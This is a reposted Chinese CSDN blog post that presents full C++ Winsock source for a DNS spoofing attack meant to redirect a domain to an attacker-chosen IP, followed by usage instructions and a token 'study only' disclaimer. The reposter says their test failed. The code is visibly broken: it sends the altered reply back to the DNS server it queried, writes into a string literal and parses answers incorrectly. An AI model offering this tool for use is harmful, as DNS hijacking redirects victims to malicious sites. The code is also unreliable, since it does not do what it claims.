使用C++实现DNS欺骗攻击

最新推荐文章于 2024-05-20 17:16:41 发布
最新推荐文章于 2024-05-20 17:16:41 发布
阅读量205 收藏
点赞数
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuhijk2055/article/details/133763457
版权

文章为花钱购买转载,但我测试并未成功!!!

使用C++实现DNS欺骗攻击-CSDN博客

使用C++实现DNS欺骗攻击

DNS劫持是一种常见的网络攻击方式,通过篡改DNS响应数据,使得用户访问的网站被重定向到攻击者指定的恶意站点。本文将介绍如何使用C++编写一个简单的DNS欺骗程序,并给出相应的源代码。

DNS欺骗原理

在DNS查询过程中,当客户端向DNS服务器请求解析某个域名时,DNS服务器会返回该域名对应的IP地址。攻击者可以伪造DNS响应数据,使得客户端获取到错误的IP地址,从而将其重定向到指定的网站上。

实现代码

我们使用C++编写一个简单的DNS欺骗程序,使得当客户端请求解析特定的域名时,我们可以将其重定向到指定的IP地址。具体的代码如下:

#include <iostream>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment(lib, "ws2_32.lib")

#define DNS_PORT 53
#define BUF_SIZE 512

// DNS头部
typedef struct _DNS_HEADER {
    unsigned short id;
    unsigned short flags;
    unsigned short qcount;
    unsigned short acount;
    unsigned short nscount;
    unsigned short arcount;
} DNS_HEADER, *PDNS_HEADER;

// 域名格式化函数
void format_domain_name(char* src, char* dst)
{
    int i, j = 0;
    strcat(src, ".");
    for (i = 0; i < strlen(src); ++i) {
        if (src[i] == '.') {
            *dst++ = i - j;
            for (; j < i; ++j) {
                *dst++ = src[j];
            }
            j++;
        }
    }
    *dst++ = '\0';
}

// DNS查询
int dns_query(char* domain_name, char* dns_server_ip, char* fake_ip)
{
    WSADATA wsaData;
    int ret = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (ret != 0) {
        std::cout << "WSAStartup failed: " << ret << std::endl;
        return -1;
    }

    // 创建socket
    SOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == INVALID_SOCKET) {
        std::cout << "Create socket failed: " << WSAGetLastError() << std::endl;
        return -1;
    }

    // DNS服务器地址
    sockaddr_in dns_addr;
    memset(&dns_addr, 0, sizeof(sockaddr_in));
    dns_addr.sin_family = AF_INET;
    dns_addr.sin_port = htons(DNS_PORT);
    inet_pton(AF_INET, dns_server_ip, &dns_addr.sin_addr.s_addr);

    // 构造DNS查询报文
    char buf[BUF_SIZE];
    memset(buf, 0, BUF_SIZE);

    DNS_HEADER* dns_header = (DNS_HEADER*)buf;
    dns_header->id = (unsigned short)GetTickCount();
    dns_header->flags = htons(0x0100);
    dns_header->qcount = htons(1);

    char* query = (char*)(dns_header + 1);
    format_domain_name(domain_name, query);
    unsigned short* qtype = (unsigned short*)(query + strlen((const char*)query) + 1);
    *qtype = htons(0x0001);
    unsigned short* qclass = (unsigned short*)(qtype + 1);
    *qclass = htons(0x0001);

    // 发送DNS查询
    ret = sendto(sock, buf, sizeof(DNS_HEADER) + strlen((const char*)query) + 5,
        0, (sockaddr*)&dns_addr, sizeof(dns_addr));
    if (ret == SOCKET_ERROR) {
        std::cout << "Send DNS query failed: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        return -1;
    }

    // 接收DNS响应
    sockaddr_in from_addr;
    int from_len = sizeof(from_addr);
    ret = recvfrom(sock, buf, BUF_SIZE, 0, (sockaddr*)&from_addr, &from_len);
    if (ret == SOCKET_ERROR) {
        std::cout << "Receive DNS response failed: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        return -1;
    }

    // 修改DNS响应
    DNS_HEADER* rsp_header = (DNS_HEADER*)buf;
    unsigned short answer_count = ntohs(rsp_header->acount);
    char* ptr = (char*)(rsp_header + 1);
    bool found = false;
    for (int i = 0; i < answer_count; ++i) {
        if (*ptr == 0xC0 && *(ptr + 2) == 0x01) {
            found = true;
            break;
        }
        ptr++;
    }
    if (found) {
        // 修改IP地址
        unsigned short* type = (unsigned short*)(ptr + 1);
        unsigned short* class_ = (unsigned short*)(type + 1);
        unsigned int* ttl = (unsigned int*)(class_ + 1);
        unsigned short* data_len = (unsigned short*)(ttl + 1);
        unsigned int* ip = (unsigned int*)(data_len + 1);
        *ip = inet_addr(fake_ip);
    } else {
        // 添加一个新的DNS响应
        char* new_rsp = ptr;
        format_domain_name("www.example.com", new_rsp);
        unsigned short* new_type = (unsigned short*)(new_rsp + strlen((const char*)new_rsp) + 1);
        *new_type = htons(0x0001);
        unsigned short* new_class_ = (unsigned short*)(new_type + 1);
        *new_class_ = htons(0x0001);
        unsigned int* new_ttl = (unsigned int*)(new_class_ + 1);
        *new_ttl = htonl(300);
        unsigned short* new_data_len = (unsigned short*)(new_ttl + 1);
        *new_data_len = htons(4);
        unsigned int* new_ip = (unsigned int*)(new_data_len + 1);
        *new_ip = inet_addr(fake_ip);

        rsp_header->acount = ntohs(answer_count + 1);
    }

    // 发送修改后的DNS响应
    ret = sendto(sock, buf, ret, 0, (sockaddr*)&from_addr, from_len);
    if (ret == SOCKET_ERROR) {
        std::cout << "Send modified DNS response failed: " << WSAGetLastError() << std::endl;
        closesocket(sock);
        return -1;
    }

    std::cout << "DNS query sent and response modified." << std::endl;

    closesocket(sock);
    WSACleanup();

    return 0;
}

int main()
{
    // 使用192.168.1.1代替实际的DNS服务器IP
    dns_query("www.example.com", "192.168.1.1", "1.2.3.4");

    return 0;
}

使用方法

在DNS查询时,调用dns_query函数并传入相应的参数即可实现DNS欺骗攻击。其中,domain_name表示需要欺骗的域名,dns_server_ip表示实际DNS服务器的IP地址,fake_ip表示需要重定向到的IP地址。

注意事项

本文仅提供学习和研究使用,请勿用于非法用途。在实际应用中,还需要考虑更加复杂的攻击方式和防御措施。

无情时尚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络攻防技术——DNS欺骗
学习记录
02-28 5081
一、题目 本实验的目标是让学生获得对DNS(域名系统)的各种攻击的第一手经验。DNS是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析实现的,这种解析发生在幕后。DNS欺骗攻击以各种方式操纵此解析过程,目的是将用户误导到其他目的地,这些目的地通常是恶意的。本实验室主要研究几种DNS欺骗攻击技术。学生将首先设置和配置DNS服务器,然后在实验室环境中的目标上尝试各种DNS欺骗攻击。 第一个大实验任务(本地DNS欺骗)中进行的攻击假设攻击者位于同一本地网络上,因此可以嗅探DNS数据包。
DNS欺骗攻击详细教程之Windows
程序媛想事儿
01-14 9179
DNS欺骗即域名信息欺骗是最常见的DNS安全问题。当一个DNS服务器掉入陷阱,使用了来自一个恶意DNS服务器的错误信息,那么该DNS服务器就被欺骗了。DNS欺骗会使那些易受攻击DNS服务器产生许多安全问题,例如:将用户引导到错误的互联网站点,或者发送一个电子邮件到一个未经授权的邮件服务器。
C/C++实现DNS劫持
单核CPU的小朋友的博客
09-09 5万+
C/C++实现DNS劫持 什么是DNS? 每个IP地址都可以有一个主机名,主机名由一个或多个字符串组成,字符串之间用小数点隔开。有了主机名,就不要死记硬背每台IP设备的IP地址,只要记住相对直观有意义的主机名就行了。这就是DNS协议的功能。 主机名到IP地址的映射有两种方式: 1)静态映射,每台设备上都配置主机到IP地址的映射,各设备独立维护自己的映射表,而且只供本设备使用; ...
DNS协议与请求的C语言实现
m0_54135264的博客
06-27 2961
C语言实现UDP协议请求
DNS欺骗方法总结
虽千万人,吾往矣
02-08 1万+
一.什么是DNS欺骗DNS欺骗是一门改变DNS原始指向IP的艺术。 什么是DNSomain Name Server 域名服务器 域名虽然便于人们记忆,但网络中的计算机之间只能互相认识IP地址,它们之间的转换工作称为域名解析。 DNS欺骗即域名信息欺骗是最常见的DNS安全问题。当一个DNS服务器掉入陷阱,使用了来自一个恶意DNS服务器的错误信息,那么该DNS服务器就被欺骗了。欺骗后便会为客
C++入门实现黑客攻击系统(准备工作)
m0_65635427的博客
05-21 7642
分析项目需求 黑客打开这个攻击系统后,首先看到的就是一个“功能菜单”。 以便让黑客选择所需要的功能。 假设需求如下: 1.网站404攻击 2.网站篡改攻击 3.网站攻击记录 4.DNS攻击 5.服务器重启攻击 项目实现 创建一个空项目CP1 添加文件admin.c #include <iostream> #include <Windows.h> /*1.网站404攻击 2.网站篡改攻击 3.网站攻击记录 4.DNS攻击 5.服务器重启攻击*/ int m
C++黑客攻击系统-权限判断
xiaov_sen的博客
05-18 695
“权限判断?”小森 “为啥权限判断?”小森 “如果不判断那么输入有啥用” 小程 “直接显示菜单不更好” 小森 “你见QQ或者微信谁有没注册的,就输入账号的”小程 “比如说 注册QQ 用手机号码, 然后根据合理的分配这个QQ号码 这个QQ 输入QQ密码 ,回车 然后缓存到QQ服务器 包括QQ账号,QQ密码, 当客户端输入QQ号和密码的时候, 点击登录, QQ服务器就有判断这个QQ是否存在 存在执行,不存在发生错误并且发送错误信息 ,xxxx,接收到了的客户端切换错误界面,如果是qq密码错误切换状态小部件提示密
C++网络编程
热门推荐
代码人生
01-24 5万+
C++网络编程
C++实现DNS劫持
09-08
DNS劫持源代码,用户可以传一个ip当作DNS服务器,被攻击者的dns会自动指向您的欺诈DNS服务器。
C++如何实现DNS域名解析
09-03
片文章介绍了C++如何实现DNS域名解析,还有对相关技术的介绍,代码很详细,需要的朋友可以参考下
基于Qt使用C++实现图书管理系统源码.zip
05-09
基于Qt使用C++实现图书管理系统源码 基于Qt使用C++实现图书管理系统源码 基于Qt使用C++实现图书管理系统源码 基于Qt使用C++实现图书管理系统源码 基于Qt使用C++实现图书管理系统源码 基于Qt使用C++实现...
dns欺骗教程含源码
05-01
dns欺骗教程含源码,
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 362
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 921
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 464
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 401
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 861
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
ip欺骗攻击 c++实现
07-19
IP欺骗攻击是指攻击者伪造或欺骗目标网络上的...需要注意的是,使用IP欺骗攻击可能违反了法律法规,且可能造成严重的安全问题,请务必遵守法律规定并谨慎使用相关技术。以上示例仅供学习和研究目的,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值